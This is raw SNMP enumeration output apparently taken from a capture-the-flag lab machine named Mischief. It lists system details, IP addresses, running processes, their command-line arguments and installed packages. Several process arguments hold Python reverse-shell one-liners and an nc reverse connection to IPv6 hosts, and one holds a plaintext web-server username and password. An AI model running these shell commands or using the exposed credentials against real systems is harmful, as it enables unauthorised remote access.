"Linux Mischief 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64"
"Me <me@example.org>"
"Mischief"
"Sitting on the Dock of the Bay"
"The MIB for Message Processing and Dispatching."
"The management information definitions for the SNMP User-based Security Model."
"The SNMP Management Architecture MIB."
"The MIB module for SNMPv2 entities"
"View-based Access Control Model for SNMP."
"The MIB module for managing TCP implementations"
"The MIB module for managing IP and ICMP implementations"
"The MIB module for managing UDP implementations"
"The MIB modules for managing SNMP Notification, plus filtering."
"The MIB module for logging SNMP Notifications."
"lo"
"Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)"
"00 50 56 AA 9C 8D "
10.10.10.2
10.10.10.2
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.13.124
10.10.15.210
10.10.15.210
10.10.16.36
10.10.16.36
10.10.15.155
10.10.15.155
10.10.15.155
10.10.15.155
10.10.15.155
10.10.15.155
10.10.15.155
"BOOT_IMAGE=/boot/vmlinuz-4.15.0-20-generic root=UUID=3002d3be-57b8-11e8-b006-000c2910992d ro maybe-ubiquity
"Physical memory"
"Virtual memory"
"Memory buffers"
"Cached memory"
"Shared memory"
"Swap space"
"/"
"/run"
"/dev/shm"
"/run/lock"
"/sys/fs/cgroup"
"/run/user/1000"
"/run/user/0"
"GenuineIntel: Intel(R) Xeon(R) CPU E5-2620 v4 @ 2.10GHz"
"network interface lo"
"network interface ens33"
"Guessing that there's a floating point co-processor"
"/"
"/run"
"/dev/shm"
"/run/lock"
"/sys/fs/cgroup"
"/run/user/1000"
"/run/user/0"
"systemd"
"kthreadd"
"kworker/0:0H"
"mm_percpu_wq"
"ksoftirqd/0"
"rcu_sched"
"rcu_bh"
"migration/0"
"watchdog/0"
"cpuhp/0"
"kdevtmpfs"
"netns"
"rcu_tasks_kthre"
"kauditd"
"khungtaskd"
"oom_reaper"
"writeback"
"kcompactd0"
"ksmd"
"khugepaged"
"crypto"
"kintegrityd"
"kblockd"
"ata_sff"
"md"
"edac-poller"
"devfreq_wq"
"watchdogd"
"kswapd0"
"ecryptfs-kthrea"
"kthrotld"
"acpi_thermal_pm"
"scsi_eh_0"
"scsi_tmf_0"
"scsi_eh_1"
"scsi_tmf_1"
"ipv6_addrconf"
"kstrp"
"charger_manager"
"mpt_poll_0"
"mpt/0"
"scsi_eh_2"
"scsi_tmf_2"
"ttm_swap"
"irq/16-vmwgfx"
"kworker/0:1H"
"raid5wq"
"jbd2/sda2-8"
"ext4-rsv-conver"
"vmtoolsd"
"systemd-journal"
"lvmetad"
"iscsi_eh"
"systemd-udevd"
"ib-comp-wq"
"ib_mcast"
"ib_nl_sa_wq"
"rdma_cm"
"systemd-network"
"systemd-resolve"
"systemd-timesyn"
"networkd-dispat"
"systemd-logind"
"rsyslogd"
"VGAuthService"
"atd"
"lxcfs"
"cron"
"dbus-daemon"
"accounts-daemon"
"cron"
"snmpd"
"sh"
"sh"
"python"
"iscsid"
"iscsid"
"polkitd"
"agetty"
"sshd"
"mysqld"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"sshd"
"systemd"
"(sd-pam)"
"sshd"
"bash"
"apache2"
"sh"
"python"
"sh"
"bash"
"sudo"
"apache2"
"apache2"
"apache2"
"sh"
"python"
"sh"
"bash"
"kworker/0:1"
"sshd"
"sshd"
"bash"
"sshd"
"sshd"
"bash"
"apache2"
"sh"
"sp.sh"
"cat"
"bash"
"nc"
"python"
"bash"
"su"
"systemd"
"(sd-pam)"
"bash"
"perl"
"sh"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"apache2"
"kworker/0:0"
"sshd"
"sshd"
"bash"
"apache2"
"apache2"
"apache2"
"sh"
"python"
"sh"
"bash"
"newgrp"
"bash"
"kworker/u2:0"
"kworker/u2:2"
"kworker/u2:1"
"sshd"
"sshd"
"sshd"
"sshd"
"sshd"
"sshd"
"/usr/bin/vmtoolsd"
"/lib/systemd/systemd-journald"
"/sbin/lvmetad"
""
"/lib/systemd/systemd-udevd"
""
""
""
""
"/lib/systemd/systemd-networkd"
"/lib/systemd/systemd-resolved"
"/lib/systemd/systemd-timesyncd"
"/usr/bin/python3"
"/lib/systemd/systemd-logind"
"/usr/sbin/rsyslogd"
"/usr/bin/VGAuthService"
"/usr/sbin/atd"
"/usr/bin/lxcfs"
"/usr/sbin/cron"
"/usr/bin/dbus-daemon"
"/usr/lib/accountsservice/accounts-daemon"
"/usr/sbin/CRON"
"/usr/sbin/snmpd"
"/bin/sh"
"/bin/sh"
"python"
"/sbin/iscsid"
"/sbin/iscsid"
"/usr/lib/policykit-1/polkitd"
"/sbin/agetty"
"/usr/sbin/sshd"
"/usr/sbin/mysqld"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"sshd: loki [priv]"
"/lib/systemd/systemd"
"(sd-pam)"
"sshd: loki@pts/0"
"-bash"
"/usr/sbin/apache2"
"sh"
"python"
"/bin/sh"
"bash"
"sudo"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"sh"
"python"
"/bin/sh"
"bash"
""
"sshd: loki [priv]"
"sshd: loki@pts/3"
"-bash"
"sshd: loki [priv]"
"sshd: loki@pts/4"
"-bash"
"/usr/sbin/apache2"
"sh"
"/bin/bash"
"cat"
"/bin/bash"
"nc"
"python"
"/bin/bash"
"su"
"/lib/systemd/systemd"
"(sd-pam)"
"-su"
"perl"
"/bin/sh"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
""
"sshd: loki [priv]"
"sshd: loki@pts/6"
"-bash"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"/usr/sbin/apache2"
"sh"
"python"
"/bin/sh"
"bash"
"newgrp"
"bash"
""
""
""
"sshd: loki [priv]"
"sshd: loki [net]"
"sshd: loki [priv]"
"sshd: loki [net]"
"sshd: [accepted]"
"sshd: [net]"
"./lto1"
"maybe-ubiquity"
"/usr/bin/networkd-dispatcher"
""
"-n"
""
"-f"
"/var/lib/lxcfs/"
"-f"
"--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only"
""
"-f"
"-Lsd -Lf /dev/null -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f"
"-c /home/loki/hosted/webstart.sh"
"/home/loki/hosted/webstart.sh"
"-m SimpleHTTPAuthServer 3366 loki:godofmischiefisloki --dir /home/loki/hosted/"
""
""
"--no-debug"
"-o -p -- \\u --noclear tty1 linux"
"-D"
"--daemonize --pid-file=/run/mysqld/mysqld.pid"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
""
"--user"
""
""
""
"-k start"
"-c python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:4::1022\""
"-c import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:4::1022\",4444,0,2))"
""
"-i"
"mysql -u root -p"
"-k start"
"-k start"
"-k start"
"-c python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:4::1022\""
"-c import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:4::1022\",4444,0,2))"
"-k start"
"-c /home/loki/sp.sh # > /dev/null 2>&1"
"/home/loki/sp.sh"
"/tmp/f"
"-i"
"-6 dead:beef::250:56ff:feb9:3081 1234"
"-c import pty; pty.spawn(\"/bin/bash\")"
""
"-"
"--user"
""
""
"/home/loki/sp.pl"
""
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
"-k start"
""
""
""
""
"-k start"
"-k start"
"-k start"
"-c python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:4::1022\""
"-c import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:4::1022\",4444,0,2))"
"accountsservice-0.6.45-1ubuntu1"
"acl-2.2.52-3build1"
"acpid-1:2.0.28-1ubuntu1"
"adduser-3.116ubuntu1"
"apache2-2.4.29-1ubuntu4.1"
"apache2-bin-2.4.29-1ubuntu4.1"
"apache2-data-2.4.29-1ubuntu4.1"
"apache2-utils-2.4.29-1ubuntu4.1"
"apparmor-2.12-4ubuntu5"
"apport-2.20.9-0ubuntu7"
"apport-symptoms-0.20"
"apt-1.6.1"
"apt-utils-1.6.1"
"at-3.1.20-3.1ubuntu2"
"base-files-10.1ubuntu2"
"base-passwd-3.5.44"
"bash-4.4.18-2ubuntu1"
"bash-completion-1:2.8-1ubuntu1"
"bc-1.07.1-2"
"bcache-tools-1.0.8-2build1"
"bind9-host-1:9.11.3+dfsg-1ubuntu1"
"binutils-2.30-15ubuntu1"
"binutils-common-2.30-15ubuntu1"
"binutils-x86-64-linux-gnu-2.30-15ubuntu1"
"bsdmainutils-11.1.2ubuntu1"
"bsdutils-1:2.31.1-0.4ubuntu3"
"btrfs-progs-4.15.1-1build1"
"btrfs-tools-4.15.1-1build1"
"build-essential-12.4ubuntu1"
"busybox-initramfs-1:1.27.2-2ubuntu3"
"busybox-static-1:1.27.2-2ubuntu3"
"byobu-5.125-0ubuntu1"
"bzip2-1.0.6-8.1"
"ca-certificates-20180409"
"cloud-guest-utils-0.30-0ubuntu5"
"cloud-init-18.2-14-g6d48d265-0ubuntu1"
"cloud-initramfs-copymods-0.40ubuntu1"
"cloud-initramfs-dyn-netconf-0.40ubuntu1"
"command-not-found-18.04.4"
"command-not-found-data-18.04.4"
"console-setup-1.178ubuntu2"
"console-setup-linux-1.178ubuntu2"
"coreutils-8.28-1ubuntu1"
"cpio-2.12+dfsg-6"
"cpp-4:7.3.0-3ubuntu2"
"cpp-7-7.3.0-16ubuntu3"
"crda-3.18-1build1"
"cron-3.0pl1-128.1ubuntu1"
"cryptsetup-2:2.0.2-1ubuntu1"
"cryptsetup-bin-2:2.0.2-1ubuntu1"
"curl-7.58.0-2ubuntu3"
"dash-0.5.8-2.10"
"dbus-1.12.2-1ubuntu1"
"debconf-1.5.66"
"debconf-i18n-1.5.66"
"debianutils-4.8.4"
"diffutils-1:3.6-1"
"dirmngr-2.2.4-1ubuntu1"
"distro-info-data-0.37ubuntu0.1"
"dmeventd-2:1.02.145-4.1ubuntu3"
"dmidecode-3.1-1"
"dmsetup-2:1.02.145-4.1ubuntu3"
"dns-root-data-2018013001"
"dnsmasq-base-2.79-1"
"dnsutils-1:9.11.3+dfsg-1ubuntu1"
"dosfstools-4.1-1"
"dpkg-1.19.0.5ubuntu2"
"dpkg-dev-1.19.0.5ubuntu2"
"e2fsprogs-1.44.1-1"
"eatmydata-105-6"
"ebtables-2.0.10.4-3.5ubuntu2"
"ed-1.10-2.1"
"eject-2.1.5+deb1+cvs20081104-13.2"
"ethtool-1:4.15-0ubuntu1"
"fakeroot-1.22-2ubuntu1"
"fdisk-2.31.1-0.4ubuntu3"
"file-1:5.32-2"
"findutils-4.6.0+git+20170828-2"
"fonts-ubuntu-console-0.83-2"
"friendly-recovery-0.2.38"
"ftp-0.17-34"
"fuse-2.9.7-1ubuntu1"
"g++-4:7.3.0-3ubuntu2"
"g++-7-7.3.0-16ubuntu3"
"gawk-1:4.1.4+dfsg-1build1"
"gcc-4:7.3.0-3ubuntu2"
"gcc-7-7.3.0-16ubuntu3"
"gcc-7-base-7.3.0-16ubuntu3"
"gcc-8-base-8-20180414-1ubuntu2"
"gdisk-1.0.3-1"
"geoip-database-20180315-1"
"gettext-base-0.19.8.1-6"
"gir1.2-glib-2.0-1.56.1-1"
"git-1:2.17.0-1ubuntu1"
"git-man-1:2.17.0-1ubuntu1"
"gnupg-2.2.4-1ubuntu1"
"gnupg-l10n-2.2.4-1ubuntu1"
"gnupg-utils-2.2.4-1ubuntu1"
"gpg-2.2.4-1ubuntu1"
"gpg-agent-2.2.4-1ubuntu1"
"gpg-wks-client-2.2.4-1ubuntu1"
"gpg-wks-server-2.2.4-1ubuntu1"
"gpgconf-2.2.4-1ubuntu1"
"gpgsm-2.2.4-1ubuntu1"
"gpgv-2.2.4-1ubuntu1"
"grep-3.1-2"
"groff-base-1.22.3-10"
"grub-common-2.02-2ubuntu8"
"grub-gfxpayload-lists-0.7"
"grub-legacy-ec2-1:1"
"grub-pc-2.02-2ubuntu8"
"grub-pc-bin-2.02-2ubuntu8"
"grub2-common-2.02-2ubuntu8"
"gzip-1.6-5ubuntu1"
"hdparm-9.54+ds-1"
"hostname-3.20"
"htop-2.1.0-3"
"info-6.5.0.dfsg.1-2"
"init-1.51"
"init-system-helpers-1.51"
"initramfs-tools-0.130ubuntu3"
"initramfs-tools-bin-0.130ubuntu3"
"initramfs-tools-core-0.130ubuntu3"
"install-info-6.5.0.dfsg.1-2"
"iproute2-4.15.0-2ubuntu1"
"iptables-1.6.1-2ubuntu2"
"iptables-persistent-1.0.4+nmu2"
"iputils-ping-3:20161105-1ubuntu2"
"iputils-tracepath-3:20161105-1ubuntu2"
"irqbalance-1.3.0-0.1"
"isc-dhcp-client-4.3.5-3ubuntu7"
"isc-dhcp-common-4.3.5-3ubuntu7"
"iso-codes-3.79-1"
"iw-4.14-0.1"
"kbd-2.0.4-2ubuntu1"
"keyboard-configuration-1.178ubuntu2"
"klibc-utils-2.0.4-9ubuntu2"
"kmod-24-1ubuntu3"
"krb5-locales-1.16-2build1"
"landscape-common-18.01-0ubuntu3"
"language-selector-common-0.188"
"less-487-0.1"
"libaccountsservice0-0.6.45-1ubuntu1"
"libacl1-2.2.52-3build1"
"libaio1-0.3.110-5"
"libalgorithm-diff-perl-1.19.03-1"
"libalgorithm-diff-xs-perl-0.04-5"
"libalgorithm-merge-perl-0.08-3"
"libapache2-mod-php-1:7.2+60ubuntu1"
"libapache2-mod-php7.2-7.2.5-0ubuntu0.18.04.1"
"libapparmor1-2.12-4ubuntu5"
"libapr1-1.6.3-2"
"libaprutil1-1.6.1-2"
"libaprutil1-dbd-sqlite3-1.6.1-2"
"libaprutil1-ldap-1.6.1-2"
"libapt-inst2.0-1.6.1"
"libapt-pkg5.0-1.6.1"
"libargon2-0-0~20161029-1.1"
"libasan4-7.3.0-16ubuntu3"
"libasn1-8-heimdal-7.5.0+dfsg-1"
"libassuan0-2.5.1-2"
"libatm1-1:2.5.1-2build1"
"libatomic1-8-20180414-1ubuntu2"
"libattr1-1:2.4.47-2build1"
"libaudit-common-1:2.8.2-1ubuntu1"
"libaudit1-1:2.8.2-1ubuntu1"
"libbind9-160-1:9.11.3+dfsg-1ubuntu1"
"libbinutils-2.30-15ubuntu1"
"libblkid1-2.31.1-0.4ubuntu3"
"libbsd0-0.8.7-1"
"libbz2-1.0-1.0.6-8.1"
"libc-bin-2.27-3ubuntu1"
"libc-dev-bin-2.27-3ubuntu1"
"libc6-2.27-3ubuntu1"
"libc6-dev-2.27-3ubuntu1"
"libcap-ng0-0.7.7-3.1"
"libcap2-1:2.25-1.2"
"libcap2-bin-1:2.25-1.2"
"libcc1-0-8-20180414-1ubuntu2"
"libcgi-fast-perl-1:2.13-1"
"libcgi-pm-perl-4.38-1"
"libcilkrts5-7.3.0-16ubuntu3"
"libcom-err2-1.44.1-1"
"libcryptsetup12-2:2.0.2-1ubuntu1"
"libcurl3-gnutls-7.58.0-2ubuntu3"
"libcurl4-7.58.0-2ubuntu3"
"libdb5.3-5.3.28-13.1ubuntu1"
"libdbus-1-3-1.12.2-1ubuntu1"
"libdbus-glib-1-2-0.110-2"
"libdebconfclient0-0.213ubuntu1"
"libdevmapper-event1.02.1-2:1.02.145-4.1ubuntu3"
"libdevmapper1.02.1-2:1.02.145-4.1ubuntu3"
"libdns-export1100-1:9.11.3+dfsg-1ubuntu1"
"libdns1100-1:9.11.3+dfsg-1ubuntu1"
"libdpkg-perl-1.19.0.5ubuntu2"
"libdrm-common-2.4.91-2"
"libdrm2-2.4.91-2"
"libdumbnet1-1.12-7build1"
"libeatmydata1-105-6"
"libedit2-3.1-20170329-1"
"libelf1-0.170-0.4"
"libencode-locale-perl-1.05-1"
"liberror-perl-0.17025-1"
"libestr0-0.1.10-2.1"
"libevent-2.1-6-2.1.8-stable-4build1"
"libevent-core-2.1-6-2.1.8-stable-4build1"
"libexpat1-2.2.5-3"
"libexpat1-dev-2.2.5-3"
"libext2fs2-1.44.1-1"
"libfakeroot-1.22-2ubuntu1"
"libfastjson4-0.99.8-2"
"libfcgi-perl-0.78-2build1"
"libfdisk1-2.31.1-0.4ubuntu3"
"libffi6-3.2.1-8"
"libfile-fcntllock-perl-0.22-3build2"
"libfreetype6-2.8.1-2ubuntu2"
"libfribidi0-0.19.7-2"
"libfuse2-2.9.7-1ubuntu1"
"libgcc-7-dev-7.3.0-16ubuntu3"
"libgcc1-1:8-20180414-1ubuntu2"
"libgcrypt20-1.8.1-4ubuntu1"
"libgdbm-compat4-1.14.1-6"
"libgdbm5-1.14.1-6"
"libgeoip1-1.6.12-1"
"libgirepository-1.0-1-1.56.1-1"
"libglib2.0-0-2.56.1-2ubuntu1"
"libglib2.0-data-2.56.1-2ubuntu1"
"libgmp10-2:6.1.2+dfsg-2"
"libgnutls30-3.5.18-1ubuntu1"
"libgomp1-8-20180414-1ubuntu2"
"libgpg-error0-1.27-6"
"libgpm2-1.20.7-5"
"libgssapi-krb5-2-1.16-2build1"
"libgssapi3-heimdal-7.5.0+dfsg-1"
"libhcrypto4-heimdal-7.5.0+dfsg-1"
"libheimbase1-heimdal-7.5.0+dfsg-1"
"libheimntlm0-heimdal-7.5.0+dfsg-1"
"libhogweed4-3.4-1"
"libhtml-parser-perl-3.72-3build1"
"libhtml-tagset-perl-3.20-3"
"libhtml-template-perl-2.97-1"
"libhttp-date-perl-6.02-1"
"libhttp-message-perl-6.14-1"
"libhx509-5-heimdal-7.5.0+dfsg-1"
"libicu60-60.2-3ubuntu3"
"libidn11-1.33-2.1ubuntu1"
"libidn2-0-2.0.4-1.1build2"
"libio-html-perl-1.001-1"
"libip4tc0-1.6.1-2ubuntu2"
"libip6tc0-1.6.1-2ubuntu2"
"libiptc0-1.6.1-2ubuntu2"
"libirs160-1:9.11.3+dfsg-1ubuntu1"
"libisc-export169-1:9.11.3+dfsg-1ubuntu1"
"libisc169-1:9.11.3+dfsg-1ubuntu1"
"libisccc160-1:9.11.3+dfsg-1ubuntu1"
"libisccfg160-1:9.11.3+dfsg-1ubuntu1"
"libisl19-0.19-1"
"libisns0-0.97-2build1"
"libitm1-8-20180414-1ubuntu2"
"libjson-c3-0.12.1-1.3"
"libk5crypto3-1.16-2build1"
"libkeyutils1-1.5.9-9.2ubuntu2"
"libklibc-2.0.4-9ubuntu2"
"libkmod2-24-1ubuntu3"
"libkrb5-26-heimdal-7.5.0+dfsg-1"
"libkrb5-3-1.16-2build1"
"libkrb5support0-1.16-2build1"
"libksba8-1.3.5-2"
"libldap-2.4-2-2.4.45+dfsg-1ubuntu1"
"libldap-common-2.4.45+dfsg-1ubuntu1"
"liblocale-gettext-perl-1.07-3build2"
"liblsan0-8-20180414-1ubuntu2"
"liblua5.2-0-5.2.4-1.1build1"
"liblvm2app2.2-2.02.176-4.1ubuntu3"
"liblvm2cmd2.02-2.02.176-4.1ubuntu3"
"liblwp-mediatypes-perl-6.02-1"
"liblwres160-1:9.11.3+dfsg-1ubuntu1"
"liblxc-common-3.0.0-0ubuntu2"
"liblxc1-3.0.0-0ubuntu2"
"liblz4-1-0.0~r131-2ubuntu3"
"liblzma5-5.2.2-1.3"
"liblzo2-2-2.08-1.2"
"libmagic-mgc-1:5.32-2"
"libmagic1-1:5.32-2"
"libmnl0-1.0.4-2"
"libmount1-2.31.1-0.4ubuntu3"
"libmpc3-1.1.0-1"
"libmpdec2-2.4.2-1ubuntu1"
"libmpfr6-4.0.1-1"
"libmpx2-8-20180414-1ubuntu2"
"libmspack0-0.6-3"
"libncurses5-6.1-1ubuntu1"
"libncursesw5-6.1-1ubuntu1"
"libnetfilter-conntrack3-1.0.6-2"
"libnettle6-3.4-1"
"libnewt0.52-0.52.20-1ubuntu1"
"libnfnetlink0-1.0.1-3"
"libnghttp2-14-1.30.0-1ubuntu1"
"libnih1-1.0.3-6ubuntu2"
"libnl-3-200-3.2.29-0ubuntu3"
"libnl-genl-3-200-3.2.29-0ubuntu3"
"libnpth0-1.5-3"
"libnss-systemd-237-3ubuntu10"
"libntfs-3g88-1:2017.3.23-2"
"libnuma1-2.0.11-2.1"
"libp11-kit0-0.23.9-2"
"libpam-cap-1:2.25-1.2"
"libpam-modules-1.1.8-3.6ubuntu2"
"libpam-modules-bin-1.1.8-3.6ubuntu2"
"libpam-runtime-1.1.8-3.6ubuntu2"
"libpam-systemd-237-3ubuntu10"
"libpam0g-1.1.8-3.6ubuntu2"
"libparted2-3.2-20"
"libpcap0.8-1.8.1-6ubuntu1"
"libpci3-1:3.5.2-1ubuntu1"
"libpcre3-2:8.39-9"
"libperl5.26-5.26.1-6"
"libpipeline1-1.5.0-1"
"libplymouth4-0.9.3-1ubuntu7"
"libpng16-16-1.6.34-1"
"libpolkit-agent-1-0-0.105-20"
"libpolkit-backend-1-0-0.105-20"
"libpolkit-gobject-1-0-0.105-20"
"libpopt0-1.16-11"
"libprocps6-2:3.3.12-3ubuntu1"
"libpsl5-0.19.1-5build1"
"libpython-all-dev-2.7.15~rc1-1"
"libpython-dev-2.7.15~rc1-1"
"libpython-stdlib-2.7.15~rc1-1"
"libpython2.7-2.7.15~rc1-1"
"libpython2.7-dev-2.7.15~rc1-1"
"libpython2.7-minimal-2.7.15~rc1-1"
"libpython2.7-stdlib-2.7.15~rc1-1"
"libpython3-stdlib-3.6.5-3"
"libpython3.6-3.6.5-3"
"libpython3.6-minimal-3.6.5-3"
"libpython3.6-stdlib-3.6.5-3"
"libquadmath0-8-20180414-1ubuntu2"
"libreadline5-5.2+dfsg-3build1"
"libreadline7-7.0-3"
"libroken18-heimdal-7.5.0+dfsg-1"
"librtmp1-2.4+20151223.gitfa8646d.1-1"
"libsasl2-2-2.1.27~101-g0780600+dfsg-3ubuntu2"
"libsasl2-modules-2.1.27~101-g0780600+dfsg-3ubuntu2"
"libsasl2-modules-db-2.1.27~101-g0780600+dfsg-3ubuntu2"
"libseccomp2-2.3.1-2.1ubuntu4"
"libselinux1-2.7-2build2"
"libsemanage-common-2.7-2build2"
"libsemanage1-2.7-2build2"
"libsensors4-1:3.4.0-4"
"libsepol1-2.7-1"
"libsigsegv2-2.12-1"
"libslang2-2.3.1a-3ubuntu1"
"libsmartcols1-2.31.1-0.4ubuntu3"
"libsnmp-base-5.7.3+dfsg-1.8ubuntu3"
"libsnmp30-5.7.3+dfsg-1.8ubuntu3"
"libsodium23-1.0.16-2"
"libsqlite3-0-3.22.0-1"
"libss2-1.44.1-1"
"libssl1.0.0-1.0.2n-1ubuntu5"
"libssl1.1-1.1.0g-2ubuntu4"
"libstdc++-7-dev-7.3.0-16ubuntu3"
"libstdc++6-8-20180414-1ubuntu2"
"libsystemd0-237-3ubuntu10"
"libtasn1-6-4.13-2"
"libtext-charwidth-perl-0.04-7.1"
"libtext-iconv-perl-1.7-5build6"
"libtext-wrapi18n-perl-0.06-7.1"
"libtimedate-perl-2.3000-2"
"libtinfo5-6.1-1ubuntu1"
"libtsan0-8-20180414-1ubuntu2"
"libubsan0-7.3.0-16ubuntu3"
"libudev1-237-3ubuntu10"
"libunistring2-0.9.9-0ubuntu1"
"libunwind8-1.2.1-8"
"liburi-perl-1.73-1"
"libusb-1.0-0-2:1.0.21-2"
"libutempter0-1.1.6-3"
"libuuid1-2.31.1-0.4ubuntu3"
"libwind0-heimdal-7.5.0+dfsg-1"
"libwrap0-7.6.q-27"
"libx11-6-2:1.6.4-3"
"libx11-data-2:1.6.4-3"
"libxau6-1:1.0.8-1"
"libxcb1-1.13-1"
"libxdmcp6-1:1.1.2-3"
"libxext6-2:1.3.3-1"
"libxml2-2.9.4+dfsg1-6.1ubuntu1"
"libxmlsec1-1.2.25-1build1"
"libxmlsec1-openssl-1.2.25-1build1"
"libxmuu1-2:1.1.2-2"
"libxslt1.1-1.1.29-5"
"libxtables12-1.6.1-2ubuntu2"
"libyaml-0-2-0.1.7-2ubuntu3"
"libzstd1-1.3.3+dfsg-2ubuntu1"
"linux-base-4.5ubuntu1"
"linux-firmware-1.173"
"linux-generic-4.15.0.20.23"
"linux-headers-4.15.0-20-4.15.0-20.21"
"linux-headers-4.15.0-20-generic-4.15.0-20.21"
"linux-headers-generic-4.15.0.20.23"
"linux-image-4.15.0-20-generic-4.15.0-20.21"
"linux-image-generic-4.15.0.20.23"
"linux-libc-dev-4.15.0-20.21"
"linux-modules-4.15.0-20-generic-4.15.0-20.21"
"linux-modules-extra-4.15.0-20-generic-4.15.0-20.21"
"linux-signed-generic-4.15.0.20.23"
"locales-2.27-3ubuntu1"
"login-1:4.5-1ubuntu1"
"logrotate-3.11.0-0.1ubuntu1"
"lsb-base-9.20170808ubuntu1"
"lsb-release-9.20170808ubuntu1"
"lshw-02.18-0.1ubuntu6"
"lsof-4.89+dfsg-0.1"
"ltrace-0.7.3-6ubuntu1"
"lvm2-2.02.176-4.1ubuntu3"
"lxcfs-3.0.0-0ubuntu1"
"lxd-client-3.0.0-0ubuntu4"
"make-4.1-9.1ubuntu1"
"man-db-2.8.3-2"
"manpages-4.15-1"
"manpages-dev-4.15-1"
"mawk-1.3.3-17ubuntu3"
"mdadm-4.0-2ubuntu1"
"mime-support-3.60ubuntu1"
"mlocate-0.26-2ubuntu3.1"
"mount-2.31.1-0.4ubuntu3"
"mtr-tiny-0.92-1"
"multiarch-support-2.27-3ubuntu1"
"mysql-client-5.7-5.7.22-0ubuntu18.04.1"
"mysql-client-core-5.7-5.7.22-0ubuntu18.04.1"
"mysql-common-5.8+1.0.4"
"mysql-server-5.7.22-0ubuntu18.04.1"
"mysql-server-5.7-5.7.22-0ubuntu18.04.1"
"mysql-server-core-5.7-5.7.22-0ubuntu18.04.1"
"nano-2.9.3-2"
"ncurses-base-6.1-1ubuntu1"
"ncurses-bin-6.1-1ubuntu1"
"ncurses-term-6.1-1ubuntu1"
"net-tools-1.60+git20161116.90da8a0-1ubuntu1"
"netbase-5.4"
"netcat-openbsd-1.187-1"
"netfilter-persistent-1.0.4+nmu2"
"netplan.io-0.36.1"
"networkd-dispatcher-1.7-0ubuntu3"
"nplan-0.36.1"
"ntfs-3g-1:2017.3.23-2"
"open-iscsi-2.0.874-5ubuntu2"
"open-vm-tools-2:10.2.0-3ubuntu3"
"openssh-client-1:7.6p1-4"
"openssh-server-1:7.6p1-4"
"openssh-sftp-server-1:7.6p1-4"
"openssl-1.1.0g-2ubuntu4"
"os-prober-1.74ubuntu1"
"overlayroot-0.40ubuntu1"
"parted-3.2-20"
"passwd-1:4.5-1ubuntu1"
"pastebinit-1.5-2"
"patch-2.7.6-2ubuntu1"
"pciutils-1:3.5.2-1ubuntu1"
"perl-5.26.1-6"
"perl-base-5.26.1-6"
"perl-modules-5.26-5.26.1-6"
"php-1:7.2+60ubuntu1"
"php-common-1:60ubuntu1"
"php-mysql-1:7.2+60ubuntu1"
"php7.2-7.2.5-0ubuntu0.18.04.1"
"php7.2-cli-7.2.5-0ubuntu0.18.04.1"
"php7.2-common-7.2.5-0ubuntu0.18.04.1"
"php7.2-json-7.2.5-0ubuntu0.18.04.1"
"php7.2-mysql-7.2.5-0ubuntu0.18.04.1"
"php7.2-opcache-7.2.5-0ubuntu0.18.04.1"
"php7.2-readline-7.2.5-0ubuntu0.18.04.1"
"pinentry-curses-1.1.0-1"
"plymouth-0.9.3-1ubuntu7"
"plymouth-theme-ubuntu-text-0.9.3-1ubuntu7"
"policykit-1-0.105-20"
"pollinate-4.31-0ubuntu1"
"popularity-contest-1.66ubuntu1"
"powermgmt-base-1.33"
"procps-2:3.3.12-3ubuntu1"
"psmisc-23.1-1"
"publicsuffix-20180223.1310-1"
"python-2.7.15~rc1-1"
"python-all-2.7.15~rc1-1"
"python-all-dev-2.7.15~rc1-1"
"python-apt-common-1.6.0"
"python-asn1crypto-0.24.0-1"
"python-cffi-backend-1.11.5-1"
"python-crypto-2.6.1-8ubuntu2"
"python-cryptography-2.1.4-1ubuntu1.1"
"python-dbus-1.2.6-1"
"python-dev-2.7.15~rc1-1"
"python-enum34-1.1.6-2"
"python-gi-3.26.1-2"
"python-idna-2.6-1"
"python-ipaddress-1.0.17-1"
"python-keyring-10.6.0-1"
"python-keyrings.alt-3.0-1"
"python-minimal-2.7.15~rc1-1"
"python-pip-9.0.1-2"
"python-pip-whl-9.0.1-2"
"python-pkg-resources-39.0.1-2"
"python-secretstorage-2.3.1-2"
"python-setuptools-39.0.1-2"
"python-six-1.11.0-2"
"python-wheel-0.30.0-0.2"
"python-xdg-0.25-4ubuntu1"
"python2.7-2.7.15~rc1-1"
"python2.7-dev-2.7.15~rc1-1"
"python2.7-minimal-2.7.15~rc1-1"
"python3-3.6.5-3"
"python3-apport-2.20.9-0ubuntu7"
"python3-apt-1.6.0"
"python3-asn1crypto-0.24.0-1"
"python3-attr-17.4.0-2"
"python3-automat-0.6.0-1"
